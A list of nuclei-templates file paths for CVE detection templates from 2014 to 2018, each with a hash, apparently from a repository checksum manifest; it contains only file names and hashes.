+nuclei-templates/cves/2014/CVE-2014-4940.yaml:6abfdd0a15aec2e38f3d8bf5d4d3de5315344d16 +nuclei-templates/cves/2014/CVE-2014-4942.yaml:5731d20e73a9e2cd4767d087024482f6b3c5454d +nuclei-templates/cves/2014/CVE-2014-5111.yaml:f880cb40cd3fc216a438fef668442999e4109e21 +nuclei-templates/cves/2014/CVE-2014-5258.yaml:f9c281ba1984b2d7a0f790f834cfb8c0fb388c20 +nuclei-templates/cves/2014/CVE-2014-5368.yaml:8a45c7d5374c60b0f7191f998c6763a522ced6d5 +nuclei-templates/cves/2014/CVE-2014-6271.yaml:6cdcc9eabbd2d308e014bb95f91b6d31dbd0047b +nuclei-templates/cves/2014/CVE-2014-6308.yaml:c4d49e21ccdc241e7b33e1e6e5f02e291dd29da3 +nuclei-templates/cves/2014/CVE-2014-8676.yaml:543a0196c542c0990505e441edaf66554d299d62 +nuclei-templates/cves/2014/CVE-2014-8682.yaml:a3f708206953d85f70bc897a11fcba344b31d8e7 +nuclei-templates/cves/2014/CVE-2014-8799.yaml:54f64d9cafb2e533aaebf4c13ece0e9c82b4ae6a +nuclei-templates/cves/2014/CVE-2014-9094.yaml:b0279eaa52898e71661640633a966dfe89d56ce7 +nuclei-templates/cves/2014/CVE-2014-9119.yaml:c783aa27d28c5122e325311bcace687dba9d6b38 +nuclei-templates/cves/2014/CVE-2014-9444.yaml:5baf804f0673481723397887b3e53ce060023ca3 +nuclei-templates/cves/2014/CVE-2014-9606.yaml:2c1b9b76231d12405b003d52336c94c4c553a95e +nuclei-templates/cves/2014/CVE-2014-9607.yaml:93d62f1dd71f44ad5b6002a4a4ed1d21491c7ee0 +nuclei-templates/cves/2014/CVE-2014-9608.yaml:b87af1b37fd7325280e8dba4b02f41ac7b6a3782 +nuclei-templates/cves/2014/CVE-2014-9609.yaml:c07638ec864f6d3a96222debb1d20aec1a808824 +nuclei-templates/cves/2014/CVE-2014-9614.yaml:b69f8c56029d965e16c3bc3e7ed85c686a866aea +nuclei-templates/cves/2014/CVE-2014-9615.yaml:0ff2d4a174a7f57fecc1c0d4ff8a7c5d9708b590 +nuclei-templates/cves/2014/CVE-2014-9617.yaml:3c6830d83ab954cce30d08f647c557ba75d82959 +nuclei-templates/cves/2014/CVE-2014-9618.yaml:9db2530197ad5a57b481b821de947b4403590339 +nuclei-templates/cves/2015/CVE-2015-0554.yaml:8becc45a2589579f1233c12a4246d0aaa3ef4e67 +nuclei-templates/cves/2015/CVE-2015-1000005.yaml:1c4baf6ffb0afcafe2469d9976ceec4e0511124c +nuclei-templates/cves/2015/CVE-2015-1000010.yaml:380dccfe9277bb5b13c2d6310fb272169a2faaa3 +nuclei-templates/cves/2015/CVE-2015-1000012.yaml:d9a8f0c082f187d12571b5f1bbe1f2cafd9f1add +nuclei-templates/cves/2015/CVE-2015-1427.yaml:a8bb522f4b840d12c2b853ce84a64118b6a845e4 +nuclei-templates/cves/2015/CVE-2015-1503.yaml:7700802a3246b942b06061a34f8fd6cdf469d300 +nuclei-templates/cves/2015/CVE-2015-1579.yaml:7dba4d09b212d7cbdc373b0b1281a06664414976 +nuclei-templates/cves/2015/CVE-2015-1880.yaml:e6baa9e30864eb131df729e1537f2751340d071e +nuclei-templates/cves/2015/CVE-2015-2067.yaml:1f717cdae3bfa61726d12c7dfb3bf6b922126b48 +nuclei-templates/cves/2015/CVE-2015-2068.yaml:7785009c976753cb564d7c9c4a62a65539d1207e +nuclei-templates/cves/2015/CVE-2015-2080.yaml:f82570b7ca7a4ae877f4cfbc4139ad4ea406ce67 +nuclei-templates/cves/2015/CVE-2015-2166.yaml:1e5b172e347ad3a2cd402898f9b5554613a3ce3c +nuclei-templates/cves/2015/CVE-2015-2807.yaml:0e5789523e772145274cb64c81a5007d2b7c3d9f +nuclei-templates/cves/2015/CVE-2015-3035.yaml:81bc8a2a06094dfa3c8c8c974740e3a91c1c97af +nuclei-templates/cves/2015/CVE-2015-3224.yaml:cab2830b80d7c793be8aec7dbfef6e38e9e18657 +nuclei-templates/cves/2015/CVE-2015-3306.yaml:e900206f92e558f69af7f73cb79552a2818cf5bc +nuclei-templates/cves/2015/CVE-2015-3337.yaml:54a9e1481fb6d830efc7dc83d272533cb2eee4aa +nuclei-templates/cves/2015/CVE-2015-3648.yaml:c2a1e9fdef9bb820da8ac78ddb7231324c6b961b +nuclei-templates/cves/2015/CVE-2015-3897.yaml:46dd2c1dbcfc36188318016afb5c7dd77260eecb +nuclei-templates/cves/2015/CVE-2015-4050.yaml:1217bedec3819acf3ea0b1cce94a7a375d06da2b +nuclei-templates/cves/2015/CVE-2015-4074.yaml:18dd70e9f32cb450f83cdbc4edda7275c80dcb3b +nuclei-templates/cves/2015/CVE-2015-4127.yaml:eb3d38b5074e680d3399bbd8c5afe8771ec74751 +nuclei-templates/cves/2015/CVE-2015-4414.yaml:fde6fdabe155582729cba24ceea2f75f3e830ca9 +nuclei-templates/cves/2015/CVE-2015-4632.yaml:a70159564ddcd8eb0f072d22c03b4a2afbebf61f +nuclei-templates/cves/2015/CVE-2015-4666.yaml:77fdace9b7bac7fef6d4ffd5f7221aeecd9f8a19 +nuclei-templates/cves/2015/CVE-2015-4668.yaml:f1ea738583084f2360b1477746ddb64676dd500c +nuclei-templates/cves/2015/CVE-2015-4694.yaml:afaed0e854eecb09d736fbd4f92e8898d92a1288 +nuclei-templates/cves/2015/CVE-2015-5354.yaml:9da7611047f5741144699c598b156d8e9b5333e4 +nuclei-templates/cves/2015/CVE-2015-5461.yaml:a29c2fb849603ec78209e09d92277cc06861e372 +nuclei-templates/cves/2015/CVE-2015-5469.yaml:ea87706a022c623c6e6662afd9ba0095376847f4 +nuclei-templates/cves/2015/CVE-2015-5471.yaml:2522c17cc0b24482b00c30e185fec1f80b93d310 +nuclei-templates/cves/2015/CVE-2015-5531.yaml:cee6e009c255bc21104e417334bcbc785427bc8d +nuclei-templates/cves/2015/CVE-2015-5688.yaml:6af0b8c68dcf773a782a94b12c0fef7edc688100 +nuclei-templates/cves/2015/CVE-2015-6477.yaml:ffdc2c59dd582924c342c087d684c4825d95b98b +nuclei-templates/cves/2015/CVE-2015-6544.yaml:fa01f46c87b01c0ffa191e79e1af2ee3025f22dd +nuclei-templates/cves/2015/CVE-2015-6920.yaml:6b9171bf5615c9fecd9b2fe96114cba31569dd60 +nuclei-templates/cves/2015/CVE-2015-7245.yaml:a5f63d8a108bb72cb45f5398d7b707a960847ba2 +nuclei-templates/cves/2015/CVE-2015-7297.yaml:3e110635a3a5a5625b5b9774b16520db0c6586e4 +nuclei-templates/cves/2015/CVE-2015-7377.yaml:d8c9fd70b095980342d70a01fcec885388c64a75 +nuclei-templates/cves/2015/CVE-2015-7450.yaml:164dfcd4a1b7f4d9f035958ad7bf020a1bf52e60 +nuclei-templates/cves/2015/CVE-2015-7780.yaml:59e1790eef82185ede8d6c859ee2813df9fbbeed +nuclei-templates/cves/2015/CVE-2015-7823.yaml:1aae112fca44dbba7fee18c658ed46f767d51926 +nuclei-templates/cves/2015/CVE-2015-8349.yaml:13f61c2ad94e2c5ffb60325c63c6f988c33f7925 +nuclei-templates/cves/2015/CVE-2015-8399.yaml:e91e5eb513b7cebcc46bb103a1de874d82da1feb +nuclei-templates/cves/2015/CVE-2015-8813.yaml:db4b57d67aa53fdd79b18af65a2779d8e3600348 +nuclei-templates/cves/2015/CVE-2015-9414.yaml:90201fbb8450237d1d83201d487b292995325b3f +nuclei-templates/cves/2015/CVE-2015-9480.yaml:406ef4c039d036c8a502d965a68e3be1b57fbe17 +nuclei-templates/cves/2016/CVE-2016-0957.yaml:f432ea04212c89e3b01f414e0c3be3b7f0a3eb7f +nuclei-templates/cves/2016/CVE-2016-1000126.yaml:8e201d749c949be636afb59dee972385febdd320 +nuclei-templates/cves/2016/CVE-2016-1000127.yaml:e02e5c4b04ff7581f83d751f8b6a464d85e67775 +nuclei-templates/cves/2016/CVE-2016-1000128.yaml:165a20642c332255c2846c8f9798b0b6bf146191 +nuclei-templates/cves/2016/CVE-2016-1000129.yaml:c84f2da19ddf5c59a76f39f48c1f870543de2b08 +nuclei-templates/cves/2016/CVE-2016-1000130.yaml:fb90293a1e95c4f5b7fc7a6c746a1b3518b4a1d7 +nuclei-templates/cves/2016/CVE-2016-1000131.yaml:d0287a74ce7e0a49d295059ff8c2f480f8b25eb7 +nuclei-templates/cves/2016/CVE-2016-1000132.yaml:489be687b9ce9669f8589e7a7881ba86d9474464 +nuclei-templates/cves/2016/CVE-2016-1000133.yaml:a6f9cabae0f4d0e4418614add98262cf5f8c394c +nuclei-templates/cves/2016/CVE-2016-1000134.yaml:7be84775d403e85c7544a6dde61115e8aa596019 +nuclei-templates/cves/2016/CVE-2016-1000135.yaml:b173b9fba7735e4fcd49bede0f74b8ffebdd3940 +nuclei-templates/cves/2016/CVE-2016-1000136.yaml:1393430462efb93f9fd51da1b3b326f93ff2e528 +nuclei-templates/cves/2016/CVE-2016-1000137.yaml:dc25063f2e74ca41855b1bf618afd1e2cf0513a4 +nuclei-templates/cves/2016/CVE-2016-1000138.yaml:fe5359a83a765f7d50d925c31f95c575a0bfa9f6 +nuclei-templates/cves/2016/CVE-2016-1000139.yaml:5801066ee5b349f3b07a242d3e47702312d39a67 +nuclei-templates/cves/2016/CVE-2016-1000140.yaml:48729b1669a011abe2c35aa7b709bd4696afbd03 +nuclei-templates/cves/2016/CVE-2016-1000141.yaml:c10055c2f9de21bb6999cbbe9738821d05707f5f +nuclei-templates/cves/2016/CVE-2016-1000142.yaml:f650e43e9131f2311c7b3ad5e753562a683a6542 +nuclei-templates/cves/2016/CVE-2016-1000143.yaml:195e97b0e069292947591d23542a00dd873150c5 +nuclei-templates/cves/2016/CVE-2016-1000146.yaml:d8acdd175d8e0ca57b1e5ee63cd670b58563a6a6 +nuclei-templates/cves/2016/CVE-2016-1000148.yaml:4151fca383968050e7753afdb185b1ded25cbf47 +nuclei-templates/cves/2016/CVE-2016-1000149.yaml:90fb6f423d493c14cce6fe563f3b4fe3f6df2d66 +nuclei-templates/cves/2016/CVE-2016-1000152.yaml:f5461fd54905af042d692372c0f10b95c24fcf69 +nuclei-templates/cves/2016/CVE-2016-1000153.yaml:fc789d96a8d60a789427e9971e10c86a75f990ed +nuclei-templates/cves/2016/CVE-2016-1000154.yaml:ca9e566cf6011cb6c74ac445b6ae9ca0c6e04de3 +nuclei-templates/cves/2016/CVE-2016-1000155.yaml:097e6c30277931424c42a5508dcd8af9ebda1035 +nuclei-templates/cves/2016/CVE-2016-10033.yaml:cabb3c20a2147911b92dde311447cd53d2860d66 +nuclei-templates/cves/2016/CVE-2016-10134.yaml:1d429b7b0138546c4e8acaeaabaab73a0160a8be +nuclei-templates/cves/2016/CVE-2016-10367.yaml:5709cc14809437fd54ab59d8c72bef907c7ebf94 +nuclei-templates/cves/2016/CVE-2016-10368.yaml:b6e77e0b9e51b7385b4f51a8540b282b591828e7 +nuclei-templates/cves/2016/CVE-2016-10924.yaml:f4d1faa33adf133fb5a03ac39877b88897424cce +nuclei-templates/cves/2016/CVE-2016-10940.yaml:073525479f6336037d00e774241d0940987ee4d0 +nuclei-templates/cves/2016/CVE-2016-10956.yaml:81495f218bfdc9cf0dac33e669eb94b80fa30407 +nuclei-templates/cves/2016/CVE-2016-10960.yaml:d700675de0fdd45a559623fc0fdff32fe9a132eb +nuclei-templates/cves/2016/CVE-2016-10993.yaml:1dea8e928909b670548ba7d787403c99efb82af9 +nuclei-templates/cves/2016/CVE-2016-1555.yaml:17dabaffbeea46576998673908fe4cdfc7e27c93 +nuclei-templates/cves/2016/CVE-2016-2004.yaml:30e239cef997adf268cfd2eb7819d772c7340880 +nuclei-templates/cves/2016/CVE-2016-2389.yaml:8ad5b1e9ab973ea6d702ba25e4f8972d9f0df7df +nuclei-templates/cves/2016/CVE-2016-3081.yaml:310e978e611e3b9a2d4dceeb003e8b17c5ba5b86 +nuclei-templates/cves/2016/CVE-2016-3088.yaml:5731b9ebd3152ff77008b0666bc73e21edc71000 +nuclei-templates/cves/2016/CVE-2016-3978.yaml:131ea5ccbc852a57b14eda312add8ee2f8b72fc0 +nuclei-templates/cves/2016/CVE-2016-4975.yaml:f2e570632df28c2497294973fb6eb608759b15fd +nuclei-templates/cves/2016/CVE-2016-4977.yaml:49b9d6bc464d6770f8d7e3fee71888b01480b9c8 +nuclei-templates/cves/2016/CVE-2016-5649.yaml:48f6af671e69b64373956f8136b6852e41f05de1 +nuclei-templates/cves/2016/CVE-2016-6277.yaml:21c1b378757d1acd9940438644689e0f0c971d63 +nuclei-templates/cves/2016/CVE-2016-6601.yaml:ec4fef2fe8b1801befe5def6916b0892fbb1d747 +nuclei-templates/cves/2016/CVE-2016-7552.yaml:5b897f3dd897079bebcc16d57a712a95388fff6e +nuclei-templates/cves/2016/CVE-2016-7834.yaml:4b1e808671dcf8f55306d6600a811021d3643b89 +nuclei-templates/cves/2016/CVE-2016-7981.yaml:1f75c0962ca52fd7a6c1d9bae517b8c36dafd093 +nuclei-templates/cves/2016/CVE-2016-8527.yaml:fa7eda90a3d42ed10d2f2c6a9ce46ea0fa980b0d +nuclei-templates/cves/2017/CVE-2017-0929.yaml:dd9c2d727a86502d07309ff4e0e02e392348bc0b +nuclei-templates/cves/2017/CVE-2017-1000028.yaml:1ac6cd6aa231b3791e47c008e7e384a6c10f7ff4 +nuclei-templates/cves/2017/CVE-2017-1000029.yaml:40c18f222795aaa2a564a8b0620315ab2036b082 +nuclei-templates/cves/2017/CVE-2017-1000170.yaml:c418deb93d6fd79a287f6b2c9ce3da501000f326 +nuclei-templates/cves/2017/CVE-2017-1000486.yaml:0dd089b10d7b916cd7ef5f9caeb0e481474c5bb4 +nuclei-templates/cves/2017/CVE-2017-10075.yaml:3e6b58645474c9aa54b9b8db4f1673781d325329 +nuclei-templates/cves/2017/CVE-2017-10271.yaml:5c9a6236d7c9a90d7a45e11005bb069318108517 +nuclei-templates/cves/2017/CVE-2017-10974.yaml:97a7bd60d07238a1afd831711d0782534c39896b +nuclei-templates/cves/2017/CVE-2017-11444.yaml:ab313ac35c6231e7f65a28a7a5c43f862a2119dc +nuclei-templates/cves/2017/CVE-2017-11512.yaml:92abdeffb4c2e105784eb5461f14c9c2e2de2d13 +nuclei-templates/cves/2017/CVE-2017-11586.yaml:56ce9c36f7697e314888f3c2a1b426e32c4360b3 +nuclei-templates/cves/2017/CVE-2017-11610.yaml:7fc166e99a4163858aeb934d24df7558b24727bb +nuclei-templates/cves/2017/CVE-2017-11629.yaml:3e794f339b1e1edd10052918f484a434a6e88f8d +nuclei-templates/cves/2017/CVE-2017-12138.yaml:b7b66925126e60cb5238ad743594f6ea09a256d9 +nuclei-templates/cves/2017/CVE-2017-12149.yaml:69b9b8489ba563d9fa3eef25ddff97c051e5edb9 +nuclei-templates/cves/2017/CVE-2017-12542.yaml:6d02a8ed13d8787bc84bd644d57abd6cefe8eebd +nuclei-templates/cves/2017/CVE-2017-12544.yaml:33c081993f1297d991728ab8daf9a5507a9cadc3 +nuclei-templates/cves/2017/CVE-2017-12583.yaml:8311e37f544ca156e6b4948c8748c02526b7424b +nuclei-templates/cves/2017/CVE-2017-12611.yaml:ba727b93650abb24d371bb2d5652cb28391c9dca +nuclei-templates/cves/2017/CVE-2017-12615.yaml:28c4efd0eafeca748ca3fa16a3f99e08ee92eaee +nuclei-templates/cves/2017/CVE-2017-12629.yaml:6b404f2ab4496ab416a74f4512b3d3c9e0bafbe6 +nuclei-templates/cves/2017/CVE-2017-12635.yaml:3e88901e78a822bcdb942c96de0f68a7054c34fb +nuclei-templates/cves/2017/CVE-2017-12637.yaml:1bd4f8ceac5782a3d22ef02dac1df899e7a564d4 +nuclei-templates/cves/2017/CVE-2017-12794.yaml:8bafb64ac7f4623020185eecc14bac0bc9786722 +nuclei-templates/cves/2017/CVE-2017-14135.yaml:faf6ae85b88e650beedff429326be86c2bd866fc +nuclei-templates/cves/2017/CVE-2017-14186.yaml:2e8317d10ace9f079731f59e760245032b7662ee +nuclei-templates/cves/2017/CVE-2017-14535.yaml:b0aa56853f1da1680f7aa3faad46b99df75ec66b +nuclei-templates/cves/2017/CVE-2017-14537.yaml:8b00c539fe4e4a9855f578af6bc784a1a4a88806 +nuclei-templates/cves/2017/CVE-2017-14651.yaml:c43a10a423682f46e9abc797122946a3a3adab63 +nuclei-templates/cves/2017/CVE-2017-14849.yaml:9fe4515bcf21a5aa21196c2e7c43deebedd794e2 +nuclei-templates/cves/2017/CVE-2017-15287.yaml:1a2a9cb461ff64691eba51ade96690a5598a661f +nuclei-templates/cves/2017/CVE-2017-15363.yaml:2337af87e373936b73748b4e6eb6c4a3163009dc +nuclei-templates/cves/2017/CVE-2017-15647.yaml:752d28b0b56761eacbf3f9c17b6894ab8b334cc9 +nuclei-templates/cves/2017/CVE-2017-15715.yaml:271b3e3279ef54946fa788343067228f1926aa74 +nuclei-templates/cves/2017/CVE-2017-15944.yaml:11add7ea60d2417b3e000404bb250e2203a8dc65 +nuclei-templates/cves/2017/CVE-2017-16806.yaml:9a83f14f21323ce660fd99d701912ae88d91a6ff +nuclei-templates/cves/2017/CVE-2017-16877.yaml:71a541684c4a89c4095a4299f29b019c30307d39 +nuclei-templates/cves/2017/CVE-2017-17043.yaml:3143d6057553b5350c8a3baf7b915cf99d9deee0 +nuclei-templates/cves/2017/CVE-2017-17059.yaml:2f740a48a4bd5eabee55a7c4decd0bbb12dca462 +nuclei-templates/cves/2017/CVE-2017-17451.yaml:c2a8888758547f260cf6c7bf16624760025cf45d +nuclei-templates/cves/2017/CVE-2017-17562.yaml:2263257d838f116e59754f024605d9dddf9e61fc +nuclei-templates/cves/2017/CVE-2017-17736.yaml:ee726cc5cf672eba939be5de465fd8b92485925b +nuclei-templates/cves/2017/CVE-2017-18024.yaml:8462731e915235104b28e2ebb90c29dd47a918a6 +nuclei-templates/cves/2017/CVE-2017-18536.yaml:426153c62d30301b85579a2ecc6a66ed016a4207 +nuclei-templates/cves/2017/CVE-2017-18598.yaml:7a1c85e134684cc52b02d28afead34636dd2285f +nuclei-templates/cves/2017/CVE-2017-18638.yaml:564c301103b033b3580cc9d2dd8b646267b91a8e +nuclei-templates/cves/2017/CVE-2017-3506.yaml:90b9f205deec32ac48b1d0b2a561fc2750ed8178 +nuclei-templates/cves/2017/CVE-2017-3528.yaml:123f8fb587459fb66b3516d5f7ddd59847c240ee +nuclei-templates/cves/2017/CVE-2017-3881.yaml:a5749c1866abde2201cee906d561768cf05412fb +nuclei-templates/cves/2017/CVE-2017-4011.yaml:0a4c02cb21eaa1f27ff3e64f84faddc915ac3cbf +nuclei-templates/cves/2017/CVE-2017-5487.yaml:80a414443d0f5c9c2b5fffb9f38d379b06f2bc18 +nuclei-templates/cves/2017/CVE-2017-5521.yaml:b46c65ea3c7662c81732e4360d1150fd8d995b6b +nuclei-templates/cves/2017/CVE-2017-5631.yaml:c17b634c7b3c8ad2d0ddc55e936c6715223dbabd +nuclei-templates/cves/2017/CVE-2017-5638.yaml:b1ff812ab7c5def3046f04e0d68ae73c8f277573 +nuclei-templates/cves/2017/CVE-2017-5689.yaml:171ed66d7485956da715f6f014a7602e452a2a08 +nuclei-templates/cves/2017/CVE-2017-5982.yaml:09d5488c73c521cdb02ab654cd61297360cccb8d +nuclei-templates/cves/2017/CVE-2017-6090.yaml:899f2ae961935da71395b1286d536d74af911885 +nuclei-templates/cves/2017/CVE-2017-7269.yaml:bddfd688c2f81bc7009ca6c1fee0b9ed2af191e1 +nuclei-templates/cves/2017/CVE-2017-7391.yaml:708d6a27318ca59858ec2430f53237d50d7da464 +nuclei-templates/cves/2017/CVE-2017-7615.yaml:9d3eb013af872970134fd729eedb2594852ffebd +nuclei-templates/cves/2017/CVE-2017-7921.yaml:5a1636526bcc080af3c7e34dbd5bedbbb399c75a +nuclei-templates/cves/2017/CVE-2017-8917.yaml:622890c8dd5dfa5ccf71f0c1fe8714701ea2947b +nuclei-templates/cves/2017/CVE-2017-9140.yaml:4be6ce478bcd8eda4ff2787697199d12f61329ee +nuclei-templates/cves/2017/CVE-2017-9288.yaml:ac601333836e6987126cdb3574db64a8526fbe8f +nuclei-templates/cves/2017/CVE-2017-9506.yaml:57085f981afb9c44ce613af7375a89941e55ff6d +nuclei-templates/cves/2017/CVE-2017-9791.yaml:3599a507cd4fdef03ae2e883732685d13340e15a +nuclei-templates/cves/2017/CVE-2017-9805.yaml:7f0f6aef5634f39e22a3d612be2ae18b8eb7edc2 +nuclei-templates/cves/2017/CVE-2017-9822.yaml:26a96e7b2cc8ee8ce6624ba6684a006df2ba49bc +nuclei-templates/cves/2017/CVE-2017-9833.yaml:ce3caf4404717e4a70679230b9bd89e1400dc421 +nuclei-templates/cves/2017/CVE-2017-9841.yaml:af71f27b8b3a14864d4a6d700653815baa0c285e +nuclei-templates/cves/2018/CVE-2018-0127.yaml:1b87a942734f33b0c9cd00867ae73208b946ba09 +nuclei-templates/cves/2018/CVE-2018-0296.yaml:3dbe5e80172bc087244c58fcdfcb817730a527a9 +nuclei-templates/cves/2018/CVE-2018-1000129.yaml:f1ea72d4265b01df749369012c2bc08c30d7e12b +nuclei-templates/cves/2018/CVE-2018-1000130.yaml:2b480b31c4fe7967db787889ddaba7249eb5d0cf +nuclei-templates/cves/2018/CVE-2018-1000226.yaml:3895e1047813646752424f70656670d5f12ff5a4 +nuclei-templates/cves/2018/CVE-2018-1000533.yaml:a1ce9a0cef9054915b090cc475585620829d086a +nuclei-templates/cves/2018/CVE-2018-1000600.yaml:2c4113c070164ce0466c07161bfcbcf3777f89b8 +nuclei-templates/cves/2018/CVE-2018-1000671.yaml:d04c8ba22c3040d119a5fa5f9246d53cddee6383 +nuclei-templates/cves/2018/CVE-2018-1000856.yaml:081f184aeb404d910b52a5456cfc427a501d89c8 +nuclei-templates/cves/2018/CVE-2018-1000861.yaml:e3bac714fea626735a32cd197223f1c341f2f9d7 +nuclei-templates/cves/2018/CVE-2018-10093.yaml:2773bd65ad21ac39eed71780cf085de08dffbdff +nuclei-templates/cves/2018/CVE-2018-10095.yaml:252d3ca2e5a2a47afe1e41bc8c261a442e239b82 +nuclei-templates/cves/2018/CVE-2018-10141.yaml:52525ca01eced4d3ef74ff66870faa88970ec3b5 +nuclei-templates/cves/2018/CVE-2018-10201.yaml:d63be9124538bf648e11c1607a323ff11d68ded5 +nuclei-templates/cves/2018/CVE-2018-10230.yaml:f7398b1b8aaf5e41e0592d2010434866cd607fca +nuclei-templates/cves/2018/CVE-2018-10562.yaml:3e1583b624cab444bc50ee26da75ed0422270fe3 +nuclei-templates/cves/2018/CVE-2018-10818.yaml:c47c0f5dea105bdcc09b419f47fb5b5082850417 +nuclei-templates/cves/2018/CVE-2018-10822.yaml:0493597c9b7be970aa00449f5a2c97f774f83573 +nuclei-templates/cves/2018/CVE-2018-10823.yaml:365a9fee10b9cf2345fe78b6bc24ee871293d746 +nuclei-templates/cves/2018/CVE-2018-10956.yaml:78a3d6f26cacbe184c1f8892c9c6c2d239659d44 +nuclei-templates/cves/2018/CVE-2018-11231.yaml:beb73c2ce70cc7b42299a045c7e960c901698fbf +nuclei-templates/cves/2018/CVE-2018-11409.yaml:3eef7fe7b7b53d51849a3492180a5afec86f46ad +nuclei-templates/cves/2018/CVE-2018-11709.yaml:4fda61471c055d5b6ebacc1248c1d27ecaa1440f +nuclei-templates/cves/2018/CVE-2018-11759.yaml:e7e2b9149b135e106aff5c4ae86a47b9aac068a0 +nuclei-templates/cves/2018/CVE-2018-11776.yaml:bf232930df6937e91f24a277d898db782347817f +nuclei-templates/cves/2018/CVE-2018-11784.yaml:5f0abf18b9354065cd83e459a83505a7dafe3c35 +nuclei-templates/cves/2018/CVE-2018-12031.yaml:1b8b720ef544cbb40612d7fbe87a537ed9ef3ae7 +nuclei-templates/cves/2018/CVE-2018-12054.yaml:d6f4e43aee71d8b3dc72d355b5faf4d8392bfe11 +nuclei-templates/cves/2018/CVE-2018-1207.yaml:b574a1789c68cb602c36ba4c5b98c4967c48504c +nuclei-templates/cves/2018/CVE-2018-12095.yaml:54e17afd91dd37d3cce6a98fba53ff7ec691158f +nuclei-templates/cves/2018/CVE-2018-12296.yaml:a760b77f450cc114d95ddbd03f405c3fa4933904 +nuclei-templates/cves/2018/CVE-2018-12300.yaml:2f850dd436c4108e2dc398b47499f87a9148e04e +nuclei-templates/cves/2018/CVE-2018-12613.yaml:c9e5875d629484fb00a940ac0441c8b0e7e6a27e +nuclei-templates/cves/2018/CVE-2018-12634.yaml:cb1249e0d851b09613991430caca7c2a1849f9ba +nuclei-templates/cves/2018/CVE-2018-12675.yaml:a77824a9b1eda8e525964367ba5c043f947bd6ff +nuclei-templates/cves/2018/CVE-2018-1271.yaml:c00c35cd5790e817b91b0bc05fbe036de932b01d +nuclei-templates/cves/2018/CVE-2018-1273.yaml:1aac94cb165ded2da9a14a92307e53494eb9e505 +nuclei-templates/cves/2018/CVE-2018-12998.yaml:56ccfbf43c399c58321af708dadaa9c3ec41fad9 +nuclei-templates/cves/2018/CVE-2018-1335.yaml:2a9f204ce0a0e57aa00a72b4d519530c7b7f1297 +nuclei-templates/cves/2018/CVE-2018-13379.yaml:03ddba991e201d3297c19f4432d4e580c0bc50a1 +nuclei-templates/cves/2018/CVE-2018-13380.yaml:05efcf77cf4427dbf13323f8133ae72d2b53a986 +nuclei-templates/cves/2018/CVE-2018-13980.yaml:0017494f317b3179d598cf0df514e43b09705370 +nuclei-templates/cves/2018/CVE-2018-14013.yaml:ca5a3bfef0d58cacae12c77e273a2436d51133e9 +nuclei-templates/cves/2018/CVE-2018-14064.yaml:e4634c0a9c1434a5179971595443b28371762648 +nuclei-templates/cves/2018/CVE-2018-14474.yaml:315ec2d3be97c1c6e81f39a36a4af37054a062ab +nuclei-templates/cves/2018/CVE-2018-14574.yaml:40e040520e48e4b42a327523644d80a397c95672 +nuclei-templates/cves/2018/CVE-2018-14728.yaml:e35c967f7a3f252a0094851884c0a79bcee90bae +nuclei-templates/cves/2018/CVE-2018-14912.yaml:de4a1ae04761069ff3f06febc955bca1d9daed61 +nuclei-templates/cves/2018/CVE-2018-14916.yaml:7ce60b4ea63f0c4fcf39a6dc49ce940a0b6c186a +nuclei-templates/cves/2018/CVE-2018-14918.yaml:256f2024104ea01779bd4e0b99f8a77892981f83 +nuclei-templates/cves/2018/CVE-2018-14931.yaml:addeb184c9b729d41ae21abef5905bf7d4f01490 +nuclei-templates/cves/2018/CVE-2018-15138.yaml:fbeb05d8b145bccad16dd4167e23add30e93d166 +nuclei-templates/cves/2018/CVE-2018-15517.yaml:b15a65912b00959e0f6fb2ca65b9c964c817e10c +nuclei-templates/cves/2018/CVE-2018-15535.yaml:7a5017a49ca485643eefdd55446cfc1e97b85cce +nuclei-templates/cves/2018/CVE-2018-15745.yaml:c37704eca5a11e5265a96d8f1f5406b11f464290 +nuclei-templates/cves/2018/CVE-2018-15961.yaml:f6c948c4ab3b05518a680d51b7f313c68536d1a3 +nuclei-templates/cves/2018/CVE-2018-16059.yaml:f6ee0f80d1b30d9d755cb2a065e976a41764e968 +nuclei-templates/cves/2018/CVE-2018-16133.yaml:dd738adfbeda1d72a4cd8b7e7db221d4627a6285 +nuclei-templates/cves/2018/CVE-2018-16139.yaml:f0ef33a2bfcc85b8ae95bbc6ac23c3d06e49933a +nuclei-templates/cves/2018/CVE-2018-16167.yaml:061adc4a10469733e18121172e065dfa6efbb88b +nuclei-templates/cves/2018/CVE-2018-16283.yaml:30cc694cf570bdf0cd50e7888c04a3c3fae8e058 +nuclei-templates/cves/2018/CVE-2018-16288.yaml:6d646aaeb4aa0902fdfeca68f4686f8d8541dbdc +nuclei-templates/cves/2018/CVE-2018-16299.yaml:3b5703347d3aab3e55ec3d464b6189d65855ef9b +nuclei-templates/cves/2018/CVE-2018-16341.yaml:6993c7e2fe9abb19594245ae8a41d5bd23da1f00 +nuclei-templates/cves/2018/CVE-2018-16668.yaml:2950e19acef106e3be7c5f2c39c74e49e23c7142 +nuclei-templates/cves/2018/CVE-2018-16670.yaml:3e243975edae19e5b91b9a187f8cbb1935f17a82 +nuclei-templates/cves/2018/CVE-2018-16671.yaml:ceb263bbf464b7afcee991fc9315111025f194a6 +nuclei-templates/cves/2018/CVE-2018-16716.yaml:bfa2280881c6181a7feccb9522c09ec1db89ae24 +nuclei-templates/cves/2018/CVE-2018-16761.yaml:53f148fce63f825a9c32dbc54dcdf93c8fff0de8 +nuclei-templates/cves/2018/CVE-2018-16763.yaml:7df7d4e35ff239c9adce557e8539cdad8e14e3d1 +nuclei-templates/cves/2018/CVE-2018-16836.yaml:9fe25ff85ae43d85ed13da9978b5ddd01fe67c37 +nuclei-templates/cves/2018/CVE-2018-17246.yaml:5dc86f9906da2b9bdc4f65dd12e05ab9afbf3d22 +nuclei-templates/cves/2018/CVE-2018-17254.yaml:f4e803eb25e8ae9a81988f3a9eb9a0ced629fcdb +nuclei-templates/cves/2018/CVE-2018-17422.yaml:65d0f993c2bdfff8fa5e8828bc06de91a75b4d6f +nuclei-templates/cves/2018/CVE-2018-17431.yaml:eede081da46420472ac91dcafad13b417f2b13bf +nuclei-templates/cves/2018/CVE-2018-18069.yaml:b0b5150031bc78288b78f6e8cfcdf595d6149f7a +nuclei-templates/cves/2018/CVE-2018-18264.yaml:456efdb7d1c77d6412969b2fc2b5fe2fa2ec1e91 +nuclei-templates/cves/2018/CVE-2018-18323.yaml:58fdd492cd18ea7a5493e0c9a4848fbb103ab58e +nuclei-templates/cves/2018/CVE-2018-18570.yaml:ee8672e4aa315aa7f317039f5fde37d094a32962 +nuclei-templates/cves/2018/CVE-2018-18608.yaml:8a806193a67e9929897a6dc635afb83efb1f886e 